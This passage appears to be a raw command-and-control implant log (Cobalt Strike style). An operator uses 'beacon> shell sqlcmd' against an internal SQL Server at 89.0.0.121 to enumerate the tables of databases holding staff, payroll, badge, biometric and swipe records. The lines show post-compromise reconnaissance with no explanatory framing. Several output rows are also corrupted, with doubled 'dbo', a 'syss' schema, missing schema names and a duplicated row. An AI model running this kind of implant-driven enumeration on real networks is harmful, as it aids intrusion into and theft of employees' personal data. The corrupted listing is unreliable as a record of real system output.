SmartSystems sys system_internals_partition_columns VIEW NULL
SmartSystems sys system_internals_partitions VIEW NULL
SmartSystems sys system_objects VIEW NULL
SmartSystems sys system_parameters VIEW NULL
SmartSystems sys system_sql_modules VIEW NULL
SmartSystems sys system_views VIEW NULL
SmartSystems sys systypes VIEW NULL
SmartSystems sys sysusers VIEW NULL
SmartSystems sys table_types VIEW NULL
SmartSystems sys tables VIEW NULL
SmartSystems sys tcp_endpoints VIEW NULL
SmartSystems sys trace_categories VIEW NULL
SmartSystems sys trace_columns VIEW NULL
SmartSystems sys trace_event_bindings VIEW NULL
SmartSystems sys trace_events VIEW NULL
SmartSystems sys trace_subclass_values VIEW NULL
SmartSystems sys traces VIEW NULL
SmartSystems sys transmission_queue VIEW NULL
SmartSystems sys trigger_event_types VIEW NULL
SmartSystems sys trigger_events VIEW NULL
SmartSystems sys triggers VIEW NULL
SmartSystems sys type_assembly_usages VIEW NULL
SmartSystems sys types VIEW NULL
SmartSystems sys user_token VIEW NULL
SmartSystems sys via_endpoints VIEW NULL
SmartSystems sys views VIEW NULL
SmartSystems sys xml_indexes VIEW NULL
SmartSystems sys xml_schema_attributes VIEW NULL
SmartSystems sys xml_schema_collections VIEW NULL
SmartSystems sys xml_schema_component_placements VIEW NULL
SmartSystems sys xml_schema_components VIEW NULL
SmartSystems sys xml_schema_elements VIEW NULL
SmartSystems sys xml_schema_facets VIEW NULL
SmartSystems sys xml_schema_model_groups VIEW NULL
SmartSystems sys xml_schema_namespaces VIEW NULL
SmartSystems sys xml_schema_types VIEW NULL
SmartSystems sys xml_schema_wildcard_namespaces VIEW NULL
SmartSystems sys xml_schema_wildcards VIEW NULL

(434 rows affected)
```
 
```
beacon> shell sqlcmd -S 89.0.0.121,1433 -E -Q "use WimanDB; exec sp_tables" -W
[*] Tasked beacon to run: sqlcmd -S 89.0.0.121,1433 -E -Q "use WimanDB; exec sp_tables" -W
[+] host called home, sent: 95 bytes
[+] received output:
Changed database context to 'WimanDB'.
TABLE_QUALIFIER TABLE_OWNER TABLE_NAME TABLE_TYPE
--------------- ----------- ---------- ---------- -------
WimanDB dbo tIncPayGroup TABLE NULL
WimanDB dbo tJobAssignmentLog TABLE NULL
WimanDB dbo tPrabsReason TABLE NULL
WimanDB dbo tPRClockTime TABLE NULL
WimanDB dbo tPRGroup TABLE NULL
WimanDB dbo tPRLogInMethod TABLE NULL
WimanDB dbo tProdXPackInfoChanges TABLE NULL
WimanDB dbo tPRPayGrade TABLE NULL
WimanDB dbo tPRTempServices TABLE NULL
WimanDB dbo tPRTitle TABLE NULL
WimanDB dbo tSampleRequests TABLE NULL
WimanDB dbo tShift TABLE NULL
WimanDB dbo tSite TABLE NULL
WimanDB dbo tStaff TABLE NULL
WimanDB dbo tUserGroup TABLE NULL
WimanDB dbo tWODetxItemSpecific TABLE NULL
WimanDB dbo vAbsRecords VIEW NULL
WimanDB dbo vPRLastJobAssignment VIEW NULL
WimanDB dbo vPRLoggedIn VIEW NULL
WimanDB dbo vProdChangesListToAck VIEW NULL
WimanDB dbo vProdchangesPendingEAck VIEW NULL
WimanDB dbo vProdChangesPendingPAck VIEW NULL
WimanDB dbo vProdChangesPendingQAck VIEW NULL
WimanDB dbo vPRPayChecksPending VIEW NULL
WimanDB dbo vQtyUsedFromBatchForProduction VIEW NULL
WimanDB INFORMATION_SCHEMA CHECK_CONSTRAINTS VIEW NULL
WimanDB INFORMATION_SCHEMA COLUMN_DOMAIN_USAGE VIEW NULL
WimanDB INFORMATION_SCHEMA COLUMN_PRIVILEGES VIEW NULL
WimanDB INFORMATION_SCHEMA COLUMNS VIEW NULL
WimanDB INFORMATION_SCHEMA CONSTRAINT_COLUMN_USAGE VIEW NULL
WimanDB INFORMATION_SCHEMA CONSTRAINT_TABLE_USAGE VIEW NULL
WimanDB INFORMATION_SCHEMA DOMAIN_CONSTRAINTS VIEW NULL
WimanDB INFORMATION_SCHEMA DOMAINS VIEW NULL
WimanDB INFORMATION_SCHEMA KEY_COLUMN_USAGE VIEW NULL
WimanDB INFORMATION_SCHEMA PARAMETERS VIEW NULL
WimanDB INFORMATION_SCHEMA REFERENTIAL_CONSTRAINTS VIEW NULL
WimanDB INFORMATION_SCHEMA ROUTINE_COLUMNS VIEW NULL
WimanDB INFORMATION_SCHEMA ROUTINES VIEW NULL
WimanDB INFORMATION_SCHEMA SCHEMATA VIEW NULL
WimanDB INFORMATION_SCHEMA TABLE_CONSTRAINTS VIEW NULL
WimanDB INFORMATION_SCHEMA TABLE_PRIVILEGES VIEW NULL
WimanDB INFORMATION_SCHEMA TABLES VIEW NULL
WimanDB INFORMATION_SCHEMA VIEW_COLUMN_USAGE VIEW NULL
WimanDB INFORMATION_SCHEMA VIEW_TABLE_USAGE VIEW NULL
WimanDB INFORMATION_SCHEMA VIEWS VIEW NULL
WimanDB sys all_columns VIEW NULL
WimanDB sys all_objects VIEW NULL
WimanDB sys all_parameters VIEW NULL
WimanDB sys all_sql_modules VIEW NULL
WimanDB sys all_views VIEW NULL
WimanDB sys allocation_units VIEW NULL
WimanDB sys assemblies VIEW NULL
WimanDB sys assembly_files VIEW NULL
WimanDB sys assembly_modules VIEW NULL
WimanDB sys assembly_references VIEW NULL
WimanDB sys assembly_types VIEW NULL
WimanDB sys asymmetric_keys VIEW NULL
WimanDB sys backup_devices VIEW NULL
WimanDB sys certificates VIEW NULL
WimanDB sys change_tracking_databases VIEW NULL
WimanDB sys change_tracking_tables VIEW NULL
WimanDB sys check_constraints VIEW NULL
WimanDB sys column_type_usages VIEW NULL
WimanDB sys column_xml_schema_collection_usages VIEW NULL
WimanDB sys columns VIEW NULL
WimanDB sys computed_columns VIEW NULL
WimanDB sys configurations VIEW NULL
WimanDB sys conversation_endpoints VIEW NULL
WimanDB sys conversation_groups VIEW NULL
WimanDB sys conversation_priorities VIEW NULL
WimanDB sys credentials VIEW NULL
WimanDB sys crypt_properties VIEW NULL
WimanDB sys cryptographic_providers VIEW NULL
WimanDB sys data_spaces VIEW NULL
WimanDB sys database_audit_specification_details VIEW NULL
WimanDB sys database_audit_specifications VIEW NULL
WimanDB sys database_files VIEW NULL
WimanDB sys database_mirroring VIEW NULL
WimanDB sys database_mirroring_endpoints VIEW NULL
WimanDB sys database_mirroring_witnesses VIEW NULL
WimanDB sys database_permissions VIEW NULL
WimanDB sys database_principal_aliases VIEW NULL
WimanDB sys database_principal_aliases VIEW NULL
WimanDB sys database_recovery_status VIEW NULL
WimanDB sys database_role_members VIEW NULL
WimanDB sys databases VIEW NULL
WimanDB sys default_constraints VIEW NULL
WimanDB sys destination_data_spaces VIEW NULL
WimanDB sys dm_audit_actions VIEW NULL
WimanDB sys dm_audit_class_type_map VIEW NULL
WimanDB sys dm_broker_activated_tasks VIEW NULL
WimanDB sys dm_broker_connections VIEW NULL
WimanDB sys dm_broker_forwarded_messages VIEW NULL
WimanDB sys dm_broker_queue_monitors VIEW NULL
WimanDB sys dm_cdc_errors VIEW NULL
WimanDB sys dm_cdc_log_scan_sessions VIEW NULL
WimanDB sys dm_clr_appdomains VIEW NULL
WimanDB sys dm_clr_loaded_assemblies VIEW NULL
WimanDB sys dm_clr_properties VIEW NULL
WimanDB sys dm_clr_tasks VIEW NULL
WimanDB sys dm_cryptographic_provider_properties VIEW NULL
WimanDB sys dm_database_encryption_keys VIEW NULL
WimanDB sys dm_db_file_space_usage VIEW NULL
WimanDB sys dm_db_index_usage_stats VIEW NULL
WimanDB sys dm_db_mirroring_auto_page_repair VIEW NULL
WimanDB sys dm_db_mirroring_connections VIEW NULL
WimanDB sys dm_db_mirroring_past_actions VIEW NULL
WimanDB sys dm_db_missing_index_details VIEW NULL
WimanDB sys dm_db_missing_index_group_stats VIEW NULL
WimanDB sys dm_db_missing_index_groups VIEW NULL
WimanDB sys dm_db_partition_stats VIEW NULL
WimanDB sys dm_db_persisted_sku_features VIEW NULL
WimanDB sys dm_db_script_level VIEW NULL
WimanDB sys dm_db_session_space_usage VIEW NULL
WimanDB sys dm_db_task_space_usage VIEW NULL
WimanDB sys dm_exec_background_job_queue VIEW NULL
WimanDB sys dm_exec_background_job_queue_stats VIEW NULL
WimanDB sys dm_exec_cached_plans VIEW NULL
WimanDB sys dm_exec_connections VIEW NULL
WimanDB sys dm_exec_procedure_stats VIEW NULL
WimanDB sys dm_exec_query_memory_grants VIEW NULL
WimanDB sys dm_exec_query_optimizer_info VIEW NULL
WimanDB sys dm_exec_query_resource_semaphores VIEW NULL
WimanDB sys dm_exec_query_stats VIEW NULL
WimanDB sys dm_exec_query_transformation_stats VIEW NULL
WimanDB sys dm_exec_requests VIEW NULL
WimanDB sys dm_exec_sessions VIEW NULL
WimanDB sys dm_exec_trigger_stats VIEW NULL
WimanDB sys dm_filestream_file_io_handles VIEW NULL
WimanDB sys dm_filestream_file_io_requests VIEW NULL
WimanDB sys dm_fts_active_catalogs VIEW NULL
WimanDB sys dm_fts_fdhosts VIEW NULL
WimanDB sys dm_fts_index_population VIEW NULL
WimanDB sys dm_fts_memory_buffers VIEW NULL
WimanDB sys dm_fts_memory_pools VIEW NULL
WimanDB sys dm_fts_outstanding_batches VIEW NULL
WimanDB sys dm_fts_population_ranges VIEW NULL
WimanDB sys dm_io_backup_tapes VIEW NULL
WimanDB sys dm_io_cluster_shared_drives VIEW NULL
WimanDB sys dm_io_pending_io_requests VIEW NULL
WimanDB sys dm_os_buffer_descriptors VIEW NULL
WimanDB sys dm_os_child_instances VIEW NULL
WimanDB sys dm_os_cluster_nodes VIEW NULL
WimanDB sys dm_os_dispatcher_pools VIEW NULL
WimanDB sys dm_os_dispatchers VIEW NULL
WimanDB sys dm_os_hosts VIEW NULL
WimanDB sys dm_os_latch_stats VIEW NULL
WimanDB sys dm_os_loaded_modules VIEW NULL
WimanDB sys dm_os_memory_allocations VIEW NULL
WimanDB sys dm_os_memory_brokers VIEW NULL
WimanDB sys dm_os_memory_cache_clock_hands VIEW NULL
WimanDB sys dm_os_memory_cache_counters VIEW NULL
WimanDB sys dm_os_memory_cache_entries VIEW NULL
WimanDB sys dm_os_memory_cache_hash_tables VIEW NULL
WimanDB sys dm_os_memory_clerks VIEW NULL
WimanDB sys dm_os_memory_node_access_stats VIEW NULL
WimanDB sys dm_os_memory_nodes VIEW NULL
WimanDB sys dm_os_memory_objects VIEW NULL
WimanDB sys dm_os_memory_pools VIEW NULL
WimanDB sys dm_os_nodes VIEW NULL
WimanDB sys dm_os_performance_counters VIEW NULL
WimanDB sys dm_os_process_memory VIEW NULL
WimanDB sys dm_os_ring_buffers VIEW NULL
WimanDB sys dm_os_schedulers VIEW NULL
WimanDB sys dm_os_spinlock_stats VIEW NULL
WimanDB sys dm_os_stacks VIEW NULL
WimanDB sys dm_os_sublatches VIEW NULL
WimanDB sys dm_os_sys_info VIEW NULL
WimanDB sys dm_os_sys_memory VIEW NULL
WimanDB sys dm_os_tasks VIEW NULL
WimanDB sys dm_os_threads VIEW NULL
WimanDB sys dm_os_virtual_address_dump VIEW NULL
WimanDB sys dm_os_wait_stats VIEW NULL
WimanDB sys dm_os_waiting_tasks VIEW NULL
WimanDB sys dm_os_windows_info VIEW NULL
WimanDB sys dm_os_worker_local_storage VIEW NULL
WimanDB sys dm_os_workers VIEW NULL
WimanDB sys dm_qn_subscriptions VIEW NULL
WimanDB sys dm_repl_articles VIEW NULL
WimanDB sys dm_repl_schemas VIEW NULL
WimanDB sys dm_repl_tranhash VIEW NULL
WimanDB sys dm_repl_traninfo VIEW NULL
WimanDB sys dm_resource_governor_configuration VIEW NULL
WimanDB sys dm_resource_governor_resource_pools VIEW NULL
WimanDB sys dm_resource_governor_workload_groups VIEW NULL
WimanDB sys dm_server_audit_status VIEW NULL
WimanDB sys dm_server_memory_dumps VIEW NULL
WimanDB sys dm_server_registry VIEW NULL
WimanDB sys dm_server_services VIEW NULL
WimanDB sys dm_tran_active_snapshot_database_transactions VIEW NULL
WimanDB sys dm_tran_active_transactions VIEW NULL
WimanDB sys dm_tran_commit_table VIEW NULL
WimanDB sys dm_tran_current_snapshot VIEW NULL
WimanDB sys dm_tran_current_transaction VIEW NULL
WimanDB sys dm_tran_database_transactions VIEW NULL
WimanDB sys dm_tran_locks VIEW NULL
WimanDB sys dm_tran_session_transactions VIEW NULL
WimanDB sys dm_tran_top_version_generators VIEW NULL
WimanDB sys dm_tran_transactions_snapshot VIEW NULL
WimanDB sys dm_tran_version_store VIEW NULL
WimanDB sys dm_xe_map_values VIEW NULL
WimanDB sys dm_xe_object_columns VIEW NULL
WimanDB sys dm_xe_objects VIEW NULL
WimanDB sys dm_xe_packages VIEW NULL
WimanDB sys dm_xe_session_event_actions VIEW NULL
WimanDB sys dm_xe_session_events VIEW NULL
WimanDB sys dm_xe_session_object_columns VIEW NULL
WimanDB sys dm_xe_session_targets VIEW NULL
WimanDB sys dm_xe_sessions VIEW NULL
WimanDB sys endpoint_webmethods VIEW NULL
WimanDB sys endpoints VIEW NULL
WimanDB sys event_notification_event_types VIEW NULL
WimanDB sys event_notifications VIEW NULL
WimanDB sys events VIEW NULL
WimanDB sys extended_procedures VIEW NULL
WimanDB sys extended_properties VIEW NULL
WimanDB sys filegroups VIEW NULL
WimanDB sys foreign_key_columns VIEW NULL
WimanDB sys foreign_keys VIEW NULL
WimanDB sys fulltext_catalogs VIEW NULL
WimanDB sys fulltext_document_types VIEW NULL
WimanDB sys fulltext_index_catalog_usages VIEW NULL
WimanDB sys fulltext_index_columns VIEW NULL
WimanDB sys fulltext_index_fragments VIEW NULL
WimanDB sys fulltext_index_indexes VIEW NULL
WimanDB sys fulltext_languages VIEW NULL
WimanDB sys fulltext_stoplists VIEW NULL
WimanDB sys fulltext_stopwords VIEW NULL
WimanDB sys fulltext_system_stopwords VIEW NULL
WimanDB sys function_order_columns VIEW NULL
WimanDB sys http_endpoints VIEW NULL
WimanDB sys identity_columns VIEW NULL
WimanDB sys index_columns VIEW NULL
WimanDB sys indexes VIEW NULL
WimanDB sys internal_tables VIEW NULL
WimanDB sys key_constraints VIEW NULL
WimanDB sys key_encryptions VIEW NULL
WimanDB sys linked_logins VIEW NULL
WimanDB sys login_token VIEW NULL
WimanDB sys master_files VIEW NULL
WimanDB sys master_key_passwords VIEW NULL
WimanDB sys message_type_xml_schema_collection_usages VIEW NULL
WimanDB sys messages VIEW NULL
WimanDB sys module_assembly_usages VIEW NULL
WimanDB sys numbered_procedure_parameters VIEW NULL
WimanDB sys numbered_procedures VIEW NULL
WimanDB sys objects VIEW NULL
WimanDB sys openkeys VIEW NULL
WimanDB sys parameter_type_usages VIEW NULL
WimanDB sys parameter_xml_schema_collection_usages VIEW NULL
WimanDB sys parameters VIEW NULL
WimanDB sys partition_functions VIEW NULL
WimanDB sys partition_parameters VIEW NULL
WimanDB sys partition_range_values VIEW NULL
WimanDB sys partition_schemes VIEW NULL
WimanDB sys partitions VIEW NULL
WimanDB sys plan_guides VIEW NULL
WimanDB sys procedures VIEW NULL
WimanDB sys remote_logins VIEW NULL
WimanDB sys remote_service_bindings VIEW NULL
WimanDB sys resource_governor_configuration VIEW NULL
WimanDB sys resource_governor_resource_pools VIEW NULL
WimanDB sys resource_governor_workload_groups VIEW NULL
WimanDB sys routes VIEW NULL
WimanDB sys schemas VIEW NULL
WimanDB sys securable_classes VIEW NULL
WimanDB sys server_assembly_modules VIEW NULL
WimanDB sys server_audit_specification_details VIEW NULL
WimanDB sys server_audit_specifications VIEW NULL
WimanDB sys server_audits VIEW NULL
WimanDB sys server_event_notifications VIEW NULL
WimanDB sys server_event_session_actions VIEW NULL
WimanDB sys server_event_session_events VIEW NULL
WimanDB sys server_event_session_fields VIEW NULL
WimanDB sys server_event_session_targets VIEW NULL
WimanDB sys server_event_sessions VIEW NULL
WimanDB sys server_events VIEW NULL
WimanDB sys server_file_audits VIEW NULL
WimanDB sys server_permissions VIEW NULL
WimanDB sys server_principal_credentials VIEW NULL
WimanDB sys server_principals VIEW NULL
WimanDB sys server_role_members VIEW NULL
WimanDB sys server_sql_modules VIEW NULL
WimanDB sys server_trigger_events VIEW NULL
WimanDB sys server_triggers VIEW NULL
WimanDB sys servers VIEW NULL
WimanDB sys service_broker_endpoints VIEW NULL
WimanDB sys service_contract_message_usages VIEW NULL
WimanDB sys service_contract_usages VIEW NULL
WimanDB sys service_contracts VIEW NULL
WimanDB sys service_message_types VIEW NULL
WimanDB sys service_queue_usages VIEW NULL
WimanDB sys service_queues VIEW NULL
WimanDB sys services VIEW NULL
WimanDB sys soap_endpoints VIEW NULL
WimanDB sys spatial_index_tessellations VIEW NULL
WimanDB sys spatial_indexes VIEW NULL
WimanDB sys spatial_reference_systems VIEW NULL
WimanDB sys sql_dependencies VIEW NULL
WimanDB sys sql_expression_dependencies VIEW NULL
WimanDB sys sql_logins VIEW NULL
WimanDB sys sql_modules VIEW NULL
WimanDB sys stats VIEW NULL
WimanDB sys stats_columns VIEW NULL
WimanDB sys symmetric_keys VIEW NULL
WimanDB sys synonyms VIEW NULL
WimanDB sys sysaltfiles VIEW NULL
WimanDB sys syscacheobjects VIEW NULL
WimanDB sys syscharsets VIEW NULL
WimanDB sys syscolumns VIEW NULL
WimanDB syscomments VIEW NULL
WimanDB sysconfigures VIEW NULL
WimanDB sysconstraints VIEW NULL
WimanDB sys syscurconfigs VIEW NULL
WimanDB sys syscursorcolumns VIEW NULL
WimanDB sys syscursorrefs VIEW NULL
WimanDB sys syscursors VIEW NULL
WimanDB sys syscursortables VIEW NULL
WimanDB sysdatabases VIEW NULL
WimanDB sysdepends VIEW NULL
WimanDB sys sysdevices VIEW NULL
WimanDB sys sysfilegroups VIEW NULL
WimanDB sys sysfiles VIEW NULL
WimanDB sys sysforeignkeys VIEW NULL
WimanDB sys sysfulltextcatalogs VIEW NULL
WimanDB sys sysindexes VIEW NULL
WimanDB sys sysindexkeys VIEW NULL
WimanDB sys syslanguages VIEW NULL
WimanDB sys syslockinfo VIEW NULL
WimanDB sys syslogins VIEW NULL
WimanDB sys sysmembers VIEW NULL
WimanDB sys sysmessages VIEW NULL
WimanDB sys sysobjects VIEW NULL
WimanDB sys sysoledbusers VIEW NULL
WimanDB sys sysopentapes VIEW NULL
WimanDB sys sysperfinfo VIEW NULL
WimanDB sys syspermissions VIEW NULL
WimanDB sys sysprocesses VIEW NULL
WimanDB sys sysprotects VIEW NULL
WimanDB sys sysreferences VIEW NULL
WimanDB sys sysremotelogins VIEW NULL
WimanDB syss sysservers VIEW NULL
WimanDB sys system_columns VIEW NULL
WimanDB sys system_components_surface_area_configuration VIEW NULL
WimanDB sys system_internals_allocation_units VIEW NULL
WimanDB sys system_internals_partition_columns VIEW NULL
WimanDB sys system_internals_partitions VIEW NULL
WimanDB sys system_objects VIEW NULL
WimanDB sys system_parameters VIEW NULL
WimanDB sys system_sql_modules VIEW NULL
WimanDB sys system_views VIEW NULL
WimanDB sys systypes VIEW NULL
WimanDB sys sysusers VIEW NULL
WimanDB sys table_types VIEW NULL
WimanDB sys tables VIEW NULL
WimanDB sys tcp_endpoints VIEW NULL
WimanDB sys trace_categories VIEW NULL
WimanDB sys trace_columns VIEW NULL
WimanDB sys trace_event_bindings VIEW NULL
WimanDB sys trace_events VIEW NULL
WimanDB sys trace_subclass_values VIEW NULL
WimanDB sys traces VIEW NULL
WimanDB sys transmission_queue VIEW NULL
WimanDB sys trigger_event_types VIEW NULL
WimanDB sys trigger_events VIEW NULL
WimanDB sys triggers VIEW NULL
WimanDB sys type_assembly_usages VIEW NULL
WimanDB sys types VIEW NULL
WimanDB sys user_token VIEW NULL
WimanDB sys via_endpoints VIEW NULL
WimanDB sys views VIEW NULL
WimanDB sys xml_indexes VIEW NULL
WimanDB sys xml_schema_attributes VIEW NULL
WimanDB sys xml_schema_collections VIEW NULL
WimanDB sys xml_schema_component_placements VIEW NULL
WimanDB sys xml_schema_components VIEW NULL
WimanDB sys xml_schema_elements VIEW NULL
WimanDB sys xml_schema_facets VIEW NULL
WimanDB sys xml_schema_model_groups VIEW NULL
WimanDB sys xml_schema_namespaces VIEW NULL
WimanDB sys xml_schema_types VIEW NULL
WimanDB sys xml_schema_wildcard_namespaces VIEW NULL
WimanDB sys xml_schema_wildcards VIEW NULL

(383 rows affected)
```
 
```
beacon> shell sqlcmd -S 89.0.0.121,1433 -E -Q "use Workforce; exec sp_tables" -W
[*] Tasked beacon to run: sqlcmd -S 89.0.0.121,1433 -E -Q "use Workforce; exec sp_tables" -W
[+] host called home, sent: 97 bytes
[+] received output:
Changed database context to 'Workforce'.
TABLE_QUALIFIER TABLE_OWNER TABLE_NAME TABLE_TYPE
--------------- ----------- ---------- ---------- -------
Workforce dbo BADGEASSIGN TABLE NULL
Workforce dbo CUSTOMDATADEF TABLE NULL
Workforce dbo HOLIDAY TABLE NULL
Workforce dbo HOLIDAYDATE TABLE NULL
Workforce dbo KCSSTAGE TABLE NULL
Workforce dbo LABORLEVELDEF TABLE NULL
Workforce dbo MMH_ApplicationComponent TABLE NULL
Workforce dbo MMH_ApplicationComponentType TABLE NULL
Workforce dbo dbo MMH_ApplicationMenu TABLE NULL
Workforce dbo MMHGALERTPROFDETAIL TABLE NULL
Workforce dbo dbo MMHGALERTPROFILES TABLE NULL
Workforce dbo MMHGALERTRESPONSE TABLE NULL
Workforce dbo MMHGALERTRESPONSEFAILURES TABLE NULL
Workforce dbo MMHGALERTS TABLE NULL
Workforce dbo MMHGBADGECONFIG TABLE NULL
Workforce dbo MMHGDBCHANGES TABLE NULL
Workforce dbo MMHGDEVCLOSESCHED TABLE NULL
Workforce dbo MMHGDEVCLOSESCHEDTEMP TABLE NULL
Workforce dbo MMHGDEVICE TABLE NULL
Workforce dbo MMHGDEVICEDETAIL TABLE NULL
Workforce dbo MMHGDDEVICEGROUP TABLE NULL
Workforce dbo MMHGDEVICEGROUPDETAIL TABLE NULL
Workforce dbo MMHGDEVICEMONITOR TABLE NULL
Workforce dbo MMHGDEVICESCHEDULE TABLE NULL
Workforce dbo MMHGDEVICESCHEDULETEMP TABLE NULL
Workforce dbo MMHGDEVOPENSCHED TABLE NULL
Workforce dbo MMHGDEVOPENSCHEDTEMP TABLE NULL
Workforce dbo MMHGEMPGROUPDETAIL TABLE NULL
Workforce dbo MMHGEMPGROUPS TABLE NULL
Workforce dbo MMHGFLOWCONTROL TABLE NULL
Workforce dbo MMHGFLOWCONTROLDETAIL TABLE NULL
Workforce dbo dbo MMHGLOBALS TABLE NULL
Workforce dbo MMHGHOLIDAYPROFILES TABLE NULL
Workforce dbo MMHGHOLIDAYS TABLE NULL
Workforce dbo MMHGHOLPROFDETAILS TABLE NULL
Workforce dbo MMHGIBCBADGELAYOUT TABLE NULL
Workforce dbo MMHGIBCBARCODE TABLE NULL
Workforce dbo MMHGIBCMAGNETIC TABLE NULL
Workforce dbo MMHGIBCPROX TABLE NULL
Workforce dbo MMHGIBCPROXDETAIL TABLE NULL
Workforce dbo MMHGIMPORTMAP TABLE NULL
Workforce dbo MMHGKRONBIOENROLLED TABLE NULL
Workforce dbo MMHGKRONONPREMISES TABLE NULL
Workforce dbo MMHGKRONOSBIOTEMPLATE TABLE NULL
Workforce dbo MMHGKRONOSDEF TABLE NULL
Workforce dbo MMHGKRONOSDEFTYPE TABLE NULL
Workforce dbo MMHGKRONOSVALUES TABLE NULL
Workforce dbo MMHGLICENSE TABLE NULL
Workforce dbo MMHGMAPVALUES TABLE NULL
Workforce dbo MMHGMAXDAYPUNCH TABLE NULL
Workforce dbo MMHGMAXTOTPUNCH TABLE NULL
Workforce dbo MMHGMUSTER TABLE NULL
Workforce dbo MMHGOFFDAYS TABLE NULL
Workforce dbo MMHGPERSON TABLE NULL
Workforce dbo MMHGPERSONACCESS TABLE NULL
Workforce dbo MMHGPERSONDEVICE TABLE NULL
Workforce dbo MMHGPERSONFLOWCONTROL TABLE NULL
Workforce dbo MMHGPERSONTEMPLATES TABLE NULL
Workforce dbo MMHGPFCDETAIL TABLE NULL
Workforce dbo MMHGPICKLISTENTRIES TABLE NULL
Workforce dbo dbo MMHGPICKLISTITEMS TABLE NULL
Workforce dbo dbo MMHGPROCESSCONTROL TABLE NULL
Workforce dbo MMHGPROCESSCRITERIA TABLE NULL
Workforce dbo MMHGPROCESSTYPES TABLE NULL
Workforce dbo MMHGQUERIES TABLE NULL
Workforce dbo MMHGREMFROMDEVICE TABLE NULL
Workforce dbo MMHGREPORTCATEGORY TABLE NULL
Workforce dbo MMHGREPORTPROCESS TABLE NULL
Workforce dbo MMHGREPORTS TABLE NULL
Workforce dbo MMHGSCHEDULE TABLE NULL
Workforce dbo MMHGSCHEDULEDETAIL TABLE NULL
Workforce dbo MMHGSCHEDULETASKS TABLE NULL
Workforce dbo MMHGSECONDARYDB TABLE NULL
Workforce dbo MMHGSHIFTS TABLE NULL
Workforce dbo MMHGSHIFTSTEMP TABLE NULL
Workforce dbo MMHGSWIPEINFO TABLE NULL
Workforce dbo MMHGSWIPEINFOARCHIVE TABLE NULL
Workforce dbo MMHGTIMEZONE TABLE NULL
Workforce dbo MMHGUSERACCESS TABLE NULL
Workforce dbo MMHGZONE TABLE NULL
Workforce dbo MMHGZONEDETAIL TABLE NULL
Workforce dbo PERSONCSTMDATA TABLE NULL
Workforce dbo VP_PERSONV42 TABLE NULL
Workforce dbo VP_TOTALS TABLE NULL
Workforce dbo MMHGv_AlertResponseUnion VIEW NULL
Workforce dbo MMHGv_LLCDNamesLinear VIEW NULL
Workforce dbo MMHGv_RPTBiometric VIEW NULL
Workforce dbo MMHGv_RptDeviceSetup VIEW NULL
Workforce dbo MMHGv_RptDoorAssign VIEW NULL
Workforce dbo MMHGv_RPTMuster VIEW NULL
Workforce dbo MMHGv_SWIPEINFO VIEW NULL
Workforce INFORMATION_SCHEMA CHECK_CONSTRAINTS VIEW NULL
Workforce INFORMATION_SCHEMA COLUMN_DOMAIN_USAGE VIEW NULL
Workforce INFORMATION_SCHEMA COLUMN_PRIVILEGES VIEW NULL
Workforce INFORMATION_SCHEMA COLUMNS VIEW NULL
Workforce INFORMATION_SCHEMA CONSTRAINT_COLUMN_USAGE VIEW NULL
Workforce INFORMATION_SCHEMA CONSTRAINT_TABLE_USAGE VIEW NULL
Workforce INFORMATION_SCHEMA DOMAIN_CONSTRAINTS VIEW NULL
Workforce INFORMATION_SCHEMA DOMAINS VIEW NULL
Workforce INFORMATION_SCHEMA KEY_COLUMN_USAGE VIEW NULL
Workforce INFORMATION_SCHEMA PARAMETERS VIEW NULL
Workforce INFORMATION_SCHEMA REFERENTIAL_CONSTRAINTS VIEW NULL
Workforce INFORMATION_SCHEMA ROUTINE_COLUMNS VIEW NULL
Workforce INFORMATION_SCHEMA ROUTINES VIEW NULL
Workforce INFORMATION_SCHEMA SCHEMATA VIEW NULL
Workforce INFORMATION_SCHEMA TABLE_CONSTRAINTS VIEW NULL
Workforce INFORMATION_SCHEMA TABLE_PRIVILEGES VIEW NULL
Workforce INFORMATION_SCHEMA TABLES VIEW NULL
Workforce INFORMATION_SCHEMA VIEW_COLUMN_USAGE VIEW NULL
Workforce INFORMATION_SCHEMA VIEW_TABLE_USAGE VIEW NULL
Workforce INFORMATION_SCHEMA VIEWS VIEW NULL
Workforce sys all_columns VIEW NULL
Workforce sys all_objects VIEW NULL
Workforce sys all_parameters VIEW NULL
Workforce sys all_sql_modules VIEW NULL
Workforce sys all_views VIEW NULL
Workforce sys allocation_units VIEW NULL
Workforce sys assemblies VIEW NULL
Workforce sys assembly_files VIEW NULL
Workforce sys assembly_modules VIEW NULL
Workforce sys assembly_references VIEW NULL
Workforce sys assembly_types VIEW NULL
Workforce sys asymmetric_keys VIEW NULL
Workforce sys backup_devices VIEW NULL
Workforce sys certificates VIEW NULL
Workforce sys change_tracking_databases VIEW NULL
Workforce sys change_tracking_tables VIEW NULL
Workforce sys check_constraints VIEW NULL
Workforce sys column_type_usages VIEW NULL
Workforce sys column_xml_schema_collection_usages VIEW NULL
Workforce sys columns VIEW NULL
Workforce sys computed_columns VIEW NULL
Workforce sys configurations VIEW NULL
Workforce sys conversation_endpoints VIEW NULL
Workforce sys conversation_groups VIEW NULL
Workforce sys conversation_priorities VIEW NULL
Workforce sys credentials VIEW NULL
Workforce sys crypt_properties VIEW NULL
Workforce sys cryptographic_providers VIEW NULL
Workforce sys data_spaces VIEW NULL
Workforce sys database_audit_specification_details VIEW NULL
Workforce sys database_audit_specifications VIEW NULL
Workforce sys database_files VIEW NULL
Workforce sys database_mirroring VIEW NULL
Workforce sys database_mirroring_endpoints VIEW NULL
Workforce sys database_mirroring_witnesses VIEW NULL
Workforce sys database_permissions VIEW NULL
Workforce sys database_principal_aliases VIEW NULL
Workforce sys database_principals VIEW NULL
Workforce sys database_recovery_status VIEW NULL
Workforce sys database_role_members VIEW NULL
Workforce sys databases VIEW NULL
Workforce sys default_constraints VIEW NULL
Workforce sys destination_data_spaces VIEW NULL
Workforce sys dm_audit_actions VIEW NULL
Workforce sys dm_audit_class_type_map VIEW NULL
Workforce sys dm_broker_activated_tasks VIEW NULL
Workforce sys dm_broker_connections VIEW NULL
Workforce sys dm_broker_forwarded_messages VIEW NULL
Workforce sys dm_broker_queue_monitors VIEW NULL
Workforce sys dm_cdc_errors VIEW NULL
Workforce sys dm_cdc_log_scan_sessions VIEW NULL
Workforce sys dm_clr_appdomains VIEW NULL
Workforce sys dm_clr_loaded_assemblies VIEW NULL
Workforce sys dm_clr_properties VIEW NULL
Workforce sys dm_clr_tasks VIEW NULL
Workforce sys dm_cryptographic_provider_properties VIEW NULL
Workforce sys dm_database_encryption_keys VIEW NULL
Workforce sys dm_db_file_space_usage VIEW NULL
Workforce sys dm_db_index_usage_stats VIEW NULL
Workforce sys dm_db_mirroring_auto_page_repair VIEW NULL
